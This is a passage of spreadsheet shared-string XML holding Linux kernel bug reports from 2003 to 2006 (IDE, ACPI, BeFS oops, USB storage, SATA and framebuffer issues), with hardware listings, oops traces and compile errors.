    <t>Distribution: Gentoo Hardware Environment: x86, HighPoint Rocket 133 controller (HPT302 chip) Software Environment: n/a Problem Description: /usr/src/linux-beta/drivers/ide/pci$ grep HPT302_ALLOW_ATA133_6 hpt366.h #define HPT302_ALLOW_ATA133_6 0 hpt366.c:hpt3xx_ratemask() uses this to force the 302 to ATA100 mode. in fact it looks like no chip newer than the HPT372 is allowed to do 133. is this from lack of testing, or code not yet written, or some chipset bug, or...? Steps to reproduce: connect an ATA133 disk to a HPT302 controller. ~$ dmesg | grep ^hde: hde: SAMSUNG SP1614N, ATA DISK drive hde: max request size: 1024KiB hde: 312581808 sectors (160041 MB) w/8192KiB Cache, CHS=19457/255/63, UDMA(100)</t>
  </si>
  <si>
    <t>eisa_set_level_irq() called by acpi_bus_init()</t>
  </si>
  <si>
    <t>2.4.23</t>
  </si>
  <si>
    <t>2003-10-20 12:24 UTC</t>
  </si>
  <si>
    <t>2004-03-04 12:25 UTC</t>
  </si>
  <si>
    <t>On X86 in PIC mode, acpi_bus_init() calls eisa_set_level_irq() to put the PIC into level triggered mode on the SCI. Issues with this: 1. kernel build fails if CONFIG_ACPI &amp;&amp; !CONFIG_PCI eisa_set_level_irq() is in PCI specific code, even though it is PIC specific, not PCI specific. 2. may not be correct to always set SCI to level sensitive. Although the ACPI spec says that the ACPI interrupt should be level triggered, that may not be the case in practice. Indeed, with the ACPI interrupt in APIC mode we've found many exceptions. If the MB sends a pulse for the SCI and we set the PIC to level triggered, then we may get spurious IRQ7, or no ACPI interrupt at all. I believe the fix for this problem is to copy this PIC specific function into an X86 specific ACPI file, and modify it to add a warning when it actually changes the trigger mode from edge to level. If we see that warning and later see SCI not working or IRQ7 spurious interrupts, then we know we need to remove this call. On the other hand, if we see this warning and the SCI is working, then we know that we need this call for those MB's whose BIOS incorrectly sets the SCI trigger mode.</t>
  </si>
  <si>
    <t>ACPI does not distribute PIC PIRQs</t>
  </si>
  <si>
    <t>2003-10-20 13:30 UTC</t>
  </si>
  <si>
    <t>2.4 build error: : undefined reference to `use_acpi_pci'</t>
  </si>
  <si>
    <t>2003-10-20 19:58 UTC</t>
  </si>
  <si>
    <t>2.4 is missing a 2.6 fix that is necessary to build CONFIG_ACPI &amp;&amp; !CONFIG_PCI and the build fails like so: arch/i386/kernel/kernel.o(.text.init+0x3cd0): In function `disable_acpi_pci': : undefined reference to `use_acpi_pci'</t>
  </si>
  <si>
    <t>2.6.0-test11</t>
  </si>
  <si>
    <t>opps on filesystem mount</t>
  </si>
  <si>
    <t>2003-10-21 21:56 UTC</t>
  </si>
  <si>
    <t>Bob Healey</t>
  </si>
  <si>
    <t>2004-06-20 16:02 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo 1.4 Hardware Environment: IBM Thinkpad T30 Output of lspci -vvv: 00:00.0 Host bridge: Intel Corp. 82845 845 (Brookdale) Chipset Host Bridge (rev 04) Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort+ &gt;SERR- &lt;PERR- Latency: 0 Region 0: Memory at e0000000 (32-bit, prefetchable) [size=64M] Capabilities: [e4] #09 [d104] Capabilities: [a0] AGP version 2.0 Status: RQ=32 Iso- ArqSz=0 Cal=0 SBA+ ITACoh- GART64- HTrans- 64bit- FW+ AGP3- Rate=x1,x2,x4 Command: RQ=1 ArqSz=0 Cal=0 SBA- AGP- GART64- 64bit- FW+ Rate=x1 00:01.0 PCI bridge: Intel Corp. 82845 845 (Brookdale) Chipset AGP Bridge (rev 04) (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap- 66Mhz+ UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 96 Bus: primary=00, secondary=01, subordinate=01, sec-latency=64 I/O behind bridge: 00003000-00003fff Memory behind bridge: d0100000-d01fffff Prefetchable memory behind bridge: e8000000-efffffff BridgeCtl: Parity- SERR- NoISA+ VGA+ MAbort- &gt;Reset- FastB2B- 00:1d.0 USB Controller: Intel Corp. 82801CA/CAM USB (Hub #1) (rev 02) (prog-if 00 [UHCI]) Subsystem: IBM ThinkPad A/T/X Series Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin A routed to IRQ 11 Region 4: I/O ports at 1800 [size=32] 00:1d.1 USB Controller: Intel Corp. 82801CA/CAM USB (Hub #2) (rev 02) (prog-if 00 [UHCI]) Subsystem: IBM ThinkPad A/T/X Series Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin B routed to IRQ 11 Region 4: I/O ports at 1820 [size=32] 00:1d.2 USB Controller: Intel Corp. 82801CA/CAM USB (Hub #3) (rev 02) (prog-if 00 [UHCI]) Subsystem: IBM ThinkPad A/T/X Series Control: I/O+ Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Interrupt: pin C routed to IRQ 11 Region 4: I/O ports at 1840 [size=32] 00:1e.0 PCI bridge: Intel Corp. 82801BAM/CAM PCI Bridge (rev 42) (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap- 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Bus: primary=00, secondary=02, subordinate=08, sec-latency=64 I/O behind bridge: 00004000-00008fff Memory behind bridge: d0200000-dfffffff Prefetchable memory behind bridge: f0000000-f80fffff BridgeCtl: Parity- SERR- NoISA+ VGA- MAbort- &gt;Reset- FastB2B- 00:1f.0 ISA bridge: Intel Corp. 82801CAM ISA Bridge (LPC) (rev 02) Control: I/O+ Mem+ BusMaster+ SpecCycle+ MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 00:1f.1 IDE interface: Intel Corp. 82801CAM IDE U100 (rev 02) (prog-if 8a [Master SecP PriP]) Subsystem: IBM ThinkPad A/T/X Series Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin A routed to IRQ 11 Region 0: I/O ports at &lt;ignored&gt; Region 1: I/O ports at &lt;ignored&gt; Region 2: I/O ports at &lt;ignored&gt; Region 3: I/O ports at &lt;ignored&gt; Region 4: I/O ports at 1860 [size=16] Region 5: Memory at 10000000 (32-bit, non-prefetchable) [size=1K] 00:1f.3 SMBus: Intel Corp. 82801CA/CAM SMBus Controller (rev 02) Subsystem: IBM ThinkPad A/T/X Series Control: I/O+ Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Interrupt: pin B routed to IRQ 11 Region 4: I/O ports at 1880 [size=32] 00:1f.5 Multimedia audio controller: Intel Corp. 82801CA/CAM AC'97 Audio Controller (rev 02) Subsystem: IBM ThinkPad T30 Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin B routed to IRQ 11 Region 0: I/O ports at 1c00 [size=256] Region 1: I/O ports at 18c0 [size=64] 00:1f.6 Modem: Intel Corp. 82801CA/CAM AC'97 Modem Controller (rev 02) (prog-if 00 [Generic]) Subsystem: IBM ThinkPad A/T/X Series Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin B routed to IRQ 11 Region 0: I/O ports at 2400 [size=256] Region 1: I/O ports at 2000 [size=128] 01:00.0 VGA compatible controller: ATI Technologies Inc Radeon Mobility M7 LW [Radeon Mobility 7500] (prog-if 00 [VGA]) Subsystem: IBM ThinkPad T30 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping+ SERR+ FastB2B+ Status: Cap+ 66Mhz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 66 (2000ns min), cache line size 08 Interrupt: pin A routed to IRQ 11 Region 0: Memory at e8000000 (32-bit, prefetchable) [size=128M] Region 1: I/O ports at 3000 [size=256] Region 2: Memory at d0100000 (32-bit, non-prefetchable) [size=64K] Expansion ROM at &lt;unassigned&gt; [disabled] [size=128K] Capabilities: [58] AGP version 2.0 Status: RQ=48 Iso- ArqSz=0 Cal=0 SBA+ ITACoh- GART64- HTrans- 64bit- FW- AGP3- Rate=x1,x2,x4 Command: RQ=1 ArqSz=0 Cal=0 SBA+ AGP- GART64- 64bit- FW- Rate=&lt;none&gt; Capabilities: [50] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 02:00.0 CardBus bridge: Texas Instruments PCI1250 PC card Cardbus Controller (rev 01) Subsystem: IBM ThinkPad T30 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 64, cache line size 08 Interrupt: pin A routed to IRQ 11 Region 0: Memory at 50000000 (32-bit, non-prefetchable) [size=4K] Bus: primary=02, secondary=03, subordinate=06, sec-latency=176 Memory window 0: 00000000-00000000 (prefetchable) Memory window 1: 00000000-00000000 (prefetchable) I/O window 0: 00000000-00000003 I/O window 1: 00000000-00000003 BridgeCtl: Parity- SERR- ISA- VGA- MAbort- &gt;Reset+ 16bInt+ PostWrite- 16-bit legacy interface ports at 0001 02:00.1 CardBus bridge: Texas Instruments PCI1250 PC card Cardbus Controller (rev 01) Subsystem: IBM ThinkPad T30 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 64, cache line size 08 Interrupt: pin B routed to IRQ 11 Region 0: Memory at 51000000 (32-bit, non-prefetchable) [size=4K] Bus: primary=02, secondary=07, subordinate=0a, sec-latency=176 Memory window 0: 00000000-00000000 (prefetchable) Memory window 1: 00000000-00000000 (prefetchable) I/O window 0: 00000000-00000003 I/O window 1: 00000000-00000003 BridgeCtl: Parity- SERR- ISA- VGA- MAbort- &gt;Reset+ 16bInt+ PostWrite- 16-bit legacy interface ports at 0001 02:02.0 Network controller: Harris Semiconductor Prism 2.5 Wavelan chipset (rev 01) Subsystem: Intel Corp. Wireless 802.11b MiniPCI Adapter Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 64, cache line size 08 Interrupt: pin A routed to IRQ 11 Region 0: Memory at f8000000 (32-bit, prefetchable) [size=4K] Capabilities: [dc] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0+,D1+,D2+,D3hot+,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 02:08.0 Ethernet controller: Intel Corp. 82801CAM (ICH3) PRO/100 VE (LOM) Ethernet Controller (rev 42) Subsystem: IBM ThinkPad A/T/X Series Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 66 (2000ns min, 14000ns max), cache line size 08 Interrupt: pin A routed to IRQ 11 Region 0: Memory at d0200000 (32-bit, non-prefetchable) [size=4K] Region 1: I/O ports at 8000 [size=64] Capabilities: [dc] Power Management version 2 Flags: PMEClk- DSI+ D1+ D2+ AuxCurrent=0mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=2 PME- Software Environment: output of scripts/ver_linux: Linux seaking-14.dynamic.rpi.edu 2.6.0-test8 #1 Mon Oct 20 12:50:33 EDT 2003 i686 Intel(R) Pentium(R) 4 Mobile CPU 1.80GHz GenuineIntel GNU/Linux Gnu C 3.2.3 Gnu make 3.80 util-linux 2.11z mount 2.11z module-init-tools 0.9.12 e2fsprogs 1.33 pcmcia-cs 3.2.4 Linux C Library 2.3.2 Dynamic linker (ldd) 2.3.2 Procps 3.1.9 Net-tools 1.60 Kbd 1.06 Sh-utils 5.0 Modules Loaded snd_mixer_oss agpgart orinoco_pci orinoco hermes e100 parport_pc lp parport ds pcmcia_core snd_intel8x0 snd_ac97_codec snd_pcm snd_timer snd_page_alloc snd_mpu401_uart snd_rawmidi snd_seq_device snd usbcore befs nls_iso8859_1 nls_cp437 Problem Description: I have a BeOS partition that I like to keep mounted readonly. I have no problems under the 2.4 kernel. The 1st attempt to mount the partition produces the included oops. Further calls just cause mount to hang indefinately. BeFS version: 0.9.3 Unable to handle kernel NULL pointer dereference at virtual address 00000001 printing eip: c01ca3b1 *pde = 00000000 Oops: 0000 [#1] CPU: 0 EIP: 0060:[&lt;c01ca3b1&gt;] Not tainted EFLAGS: 00010202 EIP is at match_one+0x35/0x207 eax: 00002525 ebx: 00000001 ecx: 00000009 edx: 00000001 esi: 00000001 edi: cf32c000 ebp: cf32c000 esp: cfa4fde4 ds: 007b es: 007b ss: 0068 Process mount (pid: 2445, threadinfo=cfa4e000 task=cfc0a080) Stack: 00000000 00000000 00000000 0000000a 00000000 ffffffff 00000000 d18d7f80 cfa4fe40 cf32c000 cfdc3e00 c01ca5a8 cf32c000 00000001 cfa4fe40 cf32c000 cf66e7e0 cfa4fe40 d18d4b7a cf32c000 d18d7f60 cfa4fe40 c130cb90 cfa4fea4 Call Trace: [&lt;c01ca5a8&gt;] match_token+0x25/0x37 [&lt;d18d4b7a&gt;] parse_options+0x7f/0x15e [befs] [&lt;c01cc16e&gt;] snprintf+0x27/0x2b [&lt;c0180472&gt;] disk_name+0x66/0xaf [&lt;d18d4d20&gt;] befs_fill_super+0x50/0x288 [befs] [&lt;c0156ac0&gt;] sb_set_blocksize+0x25/0x53 [&lt;c0156537&gt;] get_sb_bdev+0x127/0x159 [&lt;c016a26b&gt;] alloc_vfsmnt+0x87/0xb6 [&lt;d18d501c&gt;] befs_get_sb+0x2f/0x33 [befs] [&lt;d18d4cd0&gt;] befs_fill_super+0x0/0x288 [befs] [&lt;c0156769&gt;] do_kern_mount+0x5f/0xd1 [&lt;c016b4b3&gt;] do_add_mount+0x95/0x176 [&lt;c016b7eb&gt;] do_mount+0x155/0x1a1 [&lt;c016b620&gt;] copy_mount_options+0x8c/0x102 [&lt;c016bbe1&gt;] sys_mount+0xd7/0x135 [&lt;c0109327&gt;] syscall_call+0x7/0xb Code: ac 38 e0 74 09 84 c0 75 f7 be 01 00 00 00 89 f0 48 85 c0 89 Steps to reproduce: mount -t befs /dev/somewhere /beos I think I have provided all the needed information, if not, I will provide what is missing as soon as I can figure out what is missing.</t>
  </si>
  <si>
    <t>2.6.0-test8 failed to compile,previous test series did</t>
  </si>
  <si>
    <t>2003-10-22 07:21 UTC</t>
  </si>
  <si>
    <t>2003-11-12 23:54 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian/Sid Hardware Environment: dual-processor 2.4 Ghz Xeon Software Environment: gcc 2.95.4 Problem Description: kernel-compile failure. error messages below CC arch/i386/kernel/microcode.o arch/i386/kernel/microcode.c: In function `find_matching_ucodes': arch/i386/kernel/microcode.c:328: parse error before `int' arch/i386/kernel/microcode.c:329: `ext_tablep' undeclared (first use in this function) arch/i386/kernel/microcode.c:329: (Each undeclared identifier is reported only once arch/i386/kernel/microcode.c:329: for each function it appears in.) make[1]: *** [arch/i386/kernel/microcode.o] Error 1 make: *** [arch/i386/kernel] Error 2 if [ -r System.map ]; then /sbin/depmod -ae -F System.map 2.6.0-test8; fi make[1]: `arch/i386/kernel/asm-offsets.s' is up to date. CHK include/asm-i386/asm_offsets.h CHK include/linux/compile.h CC arch/i386/kernel/microcode.o arch/i386/kernel/microcode.c: In function `find_matching_ucodes': arch/i386/kernel/microcode.c:328: parse error before `int' arch/i386/kernel/microcode.c:329: `ext_tablep' undeclared (first use in this function) arch/i386/kernel/microcode.c:329: (Each undeclared identifier is reported only once arch/i386/kernel/microcode.c:329: for each function it appears in.) make[1]: *** [arch/i386/kernel/microcode.o] Error 1 make: *** [arch/i386/kernel] Error 2 fea# gcc --version 2.95.4 Steps to reproduce: patch from -test7 make oldconfig make;make modules_install;make install</t>
  </si>
  <si>
    <t>AE_AML_UNINITIALIZED_LOCAL, iasl can't re-build DSDT, CPQ Evo N600c</t>
  </si>
  <si>
    <t>2.6.0-0.test9.1.93</t>
  </si>
  <si>
    <t>2003-10-22 13:41 UTC</t>
  </si>
  <si>
    <t>Kjartan Maraas</t>
  </si>
  <si>
    <t>2006-09-28 13:22 UTC</t>
  </si>
  <si>
    <t>Distribution: Fedora Core test3 Hardware Environment: Compaq Evo N600c laptop Software Environment: Problem Description: I get the following errors when trying to compile the dsdt from this machine Compiling "dsdt.dsl" dsdt.dsl 53: If (LEqual (\C001, 0x00)) Error 1022 - Object does not exist ^ (\C001) dsdt.dsl 166: If (\_OSI ("Windows 2001")) Warning 2030 - ^ Called method may not always return a value dsdt.dsl 3670: Method (_OFF, 0, NotSerialized) Warning 2019 - Not all control paths return a value ^ (_OFF) dsdt.dsl 5003: \_SB.C03E.C052.C19E Error 1022 - Object does not exist ^ (\_SB.C03E.C052.C19E) dsdt.dsl 6164: \_PR.C000 Error 1022 - Object does not exist ^ (\_PR.C000) dsdt.dsl 6220: Notify (\_PR.C000, 0x80) Error 1022 - Object does not exist ^ (\_PR.C000) dsdt.dsl 6293: Notify (\_PR.C000, 0x80) Error 1022 - Object does not exist ^ (\_PR.C000) ASL Input: dsdt.dsl - 6551 lines, 222973 bytes, 3919 keywords Compilation complete. 5 Errors, 2 Warnings, 0 Remarks, 1103 Optimizations [root@localhost kmaraas]# Steps to reproduce:</t>
  </si>
  <si>
    <t>sleeping function called from invalid context at include/linux/rwsem.h:66</t>
  </si>
  <si>
    <t>2003-10-22 14:58 UTC</t>
  </si>
  <si>
    <t>Dan Berger</t>
  </si>
  <si>
    <t>2003-11-14 16:59 UTC</t>
  </si>
  <si>
    <t>Distribution: RedHat 9 Hardware Environment: i686 Dell Inspiron 4150 Software Environment: Problem Description: Debug: sleeping function called from invalid context at include/linux/rwsem.h:66in_atomic():1, irqs_disabled():1 Call Trace: [&lt;c011b922&gt;] __might_sleep+0x8c/0xb2 [&lt;c0222e79&gt;] cpufreq_register_notifier+0x1b/0x6b [&lt;c0105000&gt;] rest_init+0x0/0x4a [&lt;c0356dcb&gt;] init_tsc+0x3f/0x12f [&lt;c0105000&gt;] rest_init+0x0/0x4a [&lt;c0113d7b&gt;] select_timer+0x20/0x45 [&lt;c0354077&gt;] time_init+0x3e/0x48 [&lt;c0350533&gt;] start_kernel+0x9a/0x17c [&lt;c03503a8&gt;] unknown_bootoption+0x0/0xcb Steps to reproduce: Occurs on boot.</t>
  </si>
  <si>
    <t>2.6.0-test8 usb-storage cannot initialize Lexar Jumpshot</t>
  </si>
  <si>
    <t>2003-10-22 22:17 UTC</t>
  </si>
  <si>
    <t>Simon Koch</t>
  </si>
  <si>
    <t>2003-12-02 18:20 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Hardware Environment: i386, Lexar Jumpshot + USB enabled Lexar Compact Flash card. lspci from most recently tested machine: 00:00.0 Host bridge: Intel Corp. 440BX/ZX/DX - 82443BX/ZX/DX Host bridge (rev 03) 00:01.0 PCI bridge: Intel Corp. 440BX/ZX/DX - 82443BX/ZX/DX AGP bridge (rev 03) 00:07.0 ISA bridge: Intel Corp. 82371AB/EB/MB PIIX4 ISA (rev 02) 00:07.1 IDE interface: Intel Corp. 82371AB/EB/MB PIIX4 IDE (rev 01) 00:07.2 USB Controller: Intel Corp. 82371AB/EB/MB PIIX4 USB (rev 01) 00:07.3 Bridge: Intel Corp. 82371AB/EB/MB PIIX4 ACPI (rev 02) 00:0a.0 Ethernet controller: 3Com Corporation 3c905 100BaseTX [Boomerang] 00:0b.0 Multimedia audio controller: Aureal Semiconductor Vortex 2 (rev fa) 00:0d.0 Unknown mass storage controller: Promise Technology, Inc. 20262 (rev 01) 01:00.0 VGA compatible controller: nVidia Corporation NV15 [GeForce2 GTS/Pro] (rev a4) tested with other usb-controllers, including: VIA Technologies, Inc. USB (rev 26) NEC Corporation USB (rev 65) NEC Corporation USB 2.0 (rev 2) Software Environment: added patch for au8820 support in ALSA. This bug still occurs in the stock -test8 tree. Problem Description: On inserting the Jumpshot, its activity LED blinks for a short time (&lt;1 second), then goes black. Kernel messages seem to indicate a transport error. I will attach dmesg. The error repeats until the device is removed. Steps to reproduce: modprobe usb-storage, insert Jumpshot.</t>
  </si>
  <si>
    <t>Lid switch can't wakeup machine from S3</t>
  </si>
  <si>
    <t>2003-10-24 09:28 UTC</t>
  </si>
  <si>
    <t>2004-11-17 19:22 UTC</t>
  </si>
  <si>
    <t>IBM T40 echo "3" &gt;/proc/acpi/sleep then, press LID switch or sleep button can't wakeup the machine</t>
  </si>
  <si>
    <t>Dell Latitude C600. Freezes on startup (speedstep_init)</t>
  </si>
  <si>
    <t>2.6.0-test[6-9]</t>
  </si>
  <si>
    <t>2003-10-26 01:49 UTC</t>
  </si>
  <si>
    <t>Priit Laes</t>
  </si>
  <si>
    <t>2004-01-06 10:40 UTC</t>
  </si>
  <si>
    <t>I also tried with AC-power and battery power. This debug message: signature:0x47534943x, command:0x008200b2x, event:0x00000000x, perf_level:0x00000001. was same both times. (The processor speed is 500mhz when i boot up on battery and 650 with AC)</t>
  </si>
  <si>
    <t>promise sata driver not detecting devices</t>
  </si>
  <si>
    <t>Serial ATA</t>
  </si>
  <si>
    <t>2003-10-26 07:16 UTC</t>
  </si>
  <si>
    <t>Sean O'Dubhghaill</t>
  </si>
  <si>
    <t>2003-11-14 17:09 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Linux Hardware Environment: Opteron 142 Asus Sk8n nforce3 motherboard promise 20378 sata controller on motherboard 2 sata 80Gb hard drives Software Environment: Gentoo 1.4 unstable install Problem Description: The libata and promise_sata modules load with no problems but they don't seem to find any of my hard drives, there are no new sd* devices. The GPL promise driver for 2.4 did find both drives. I have tried with both sata as modules and built into the kernel. Steps to reproduce: Use 2.6.0-test9 on a asus sk8n motherboard with sata hard drives</t>
  </si>
  <si>
    <t>tridentfb doesn't recognize my card</t>
  </si>
  <si>
    <t>2.6.1-rc2</t>
  </si>
  <si>
    <t>2005-03-07 10:58 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian/woody Hardware Environment: Mini-ITX board, VIA C3 550MHz, onboard vga Problem Description: The kernel doesn't recognize the vga card: tridentfb: Trident framebuffer 0.7.8-NEWAPI initializing tridentfb: framebuffer size = 8192 Kb tridentfb: 0000:01:00.0 board found tridentfb: probe of 0000:01:00.0 failed with error -22 lspci -vvv says: 01:00.0 VGA compatible controller: Trident Microsystems CyberBlade/i1 (rev 6a) (prog-if 00 [VGA]) Subsystem: Trident Microsystems CyberBlade/i1 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32 Interrupt: pin A routed to IRQ 11 Region 0: Memory at e1800000 (32-bit, non-prefetchable) [size=8M] Region 1: Memory at e2000000 (32-bit, non-prefetchable) [size=128K] Region 2: Memory at e1000000 (32-bit, non-prefetchable) [size=8M] Expansion ROM at &lt;unassigned&gt; [disabled] [size=64K] Capabilities: [80] AGP version 2.0 Status: RQ=32 SBA+ 64bit- FW- Rate=x1,x2 Command: RQ=0 SBA- AGP- 64bit- FW- Rate=&lt;none&gt; Capabilities: [90] Power Management version 1 Flags: PMEClk- DSI+ D1+ D2+ AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Source looks like that chip should be supported. I currently don't find what error -22 is. I'll have a look at the latest fbdev.diff from James...</t>
  </si>
  <si>
    <t>slab error in cache_free_debugcheck() ... memory outside object was overwritten [sd.c vs. MESH]</t>
  </si>
  <si>
    <t>2003-10-26 10:27 UTC</t>
  </si>
  <si>
    <t>2005-08-07 13:40 UTC</t>
  </si>
  <si>
    <t>Distribution: kernel.org Hardware Environment:PowerMac 8500 [see .dmesg for details] 00:0b.0 Host bridge: Apple Computer Inc. Bandit PowerPC host bridge (rev 03) 00:0d.0 Ethernet controller: Linksys Network Everywhere Fast Ethernet 10/100 model NC100 (rev 11) 00:0e.0 VGA compatible controller: Matrox Graphics, Inc. MGA 2064W [Millennium] (rev 01) 00:0f.0 USB Controller: OPTi Inc. 82C861 (rev 10) 00:10.0 Class ff00: Apple Computer Inc. Grand Central I/O (rev 02) 01:0b.0 Non-VGA unclassified device: Apple Computer Inc. Control Video 01:0d.0 Class ff00: Apple Computer Inc. PlanB Video-In (rev 01) Software Environment: Debian 'Testing' distribution Problem Description: SCSI driver get once stack trace per disk drive during bootup. Sample: SCSI device sda: 4226725 512-byte hdwr sectors (2164 MB) SCSI device sda: drive cache: write back slab error in cache_free_debugcheck(): cache `size-512(DMA)': double free, or memory outside object was overwritten Call trace: [c000956c] dump_stack+0x18/0x28 [c003beac] __slab_error+0x2c/0x3c [c003e784] kfree+0x290/0x384 [c00dbdbc] sd_revalidate_disk+0xb8/0x148 [c00dc020] sd_probe+0x1d4/0x2c0 [c00b9958] bus_match+0x50/0x8c [c00b9ad8] driver_attach+0x88/0xc8 [c00b9e28] bus_add_driver+0x90/0xe0 [c00ba288] driver_register+0x30/0x40 [c00d6478] scsi_register_driver+0x1c/0x2c [c02275e4] init_sd+0x5c/0x70 [c02125dc] do_initcalls+0x54/0xe0 [c0003958] init+0x1c/0xc0 [c0008cf0] kernel_thread+0x44/0x60 cde0dc88: redzone 1: 0x0, redzone 2: 0x170fc2a5. sda: [mac] sda1 sda2 sda3 sda4 sda5 sda6 sda7 sda8 sda9 sda10 sda11 sda12 Attached scsi disk sda at scsi0, channel 0, id 2, lun 0 Trace problem to vicinity of sd_read_capacity() in driver/scsi/sd.c, as freeing and regetting the buffer after that call fails, and before it, it succeeds. 'benh' says:</t>
  </si>
  <si>
    <t>pcnet_cs doesn't work (fails to RequestIRQ?)</t>
  </si>
  <si>
    <t>2003-10-26 20:27 UTC</t>
  </si>
  <si>
    <t>Shahar Goldin</t>
  </si>
  <si>
    <t>2004-01-11 15:03 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Hardware Environment: Dell Latitude CPx H500 (pentium III, intel 82371AB/EB/MB PIIX4, TI PCI1225 Cardbus) Software Environment: gcc-3.3.1, glibc-2.3.2 Problem Description: My Netgear FA411 NE2000 based PCMCIA network card doesn't work in the 2.6.0-test kernels that I've tried it with (-test6-mm4, -test8-mm1, -test9 with no patches) I compiled pcnet_cs support as a module, and cardmgr loads this module when it detects the MA411 card, but 'ifconfig eth0' returns eth0: "error fetching interface information: Device not found" checking the kern.log I found: "kernel: pcnet_cs: RequestIRQ: Unsupported mode" and checking daemon.log I found: "cardmgr[3409]: get dev info on socket 1 failed: No such device"</t>
  </si>
  <si>
    <t>acpi utility triggers an OOPS with 2.6.0-test9</t>
  </si>
  <si>
    <t>2003-10-27 02:31 UTC</t>
  </si>
  <si>
    <t>2004-03-04 12:30 UTC</t>
  </si>
  <si>
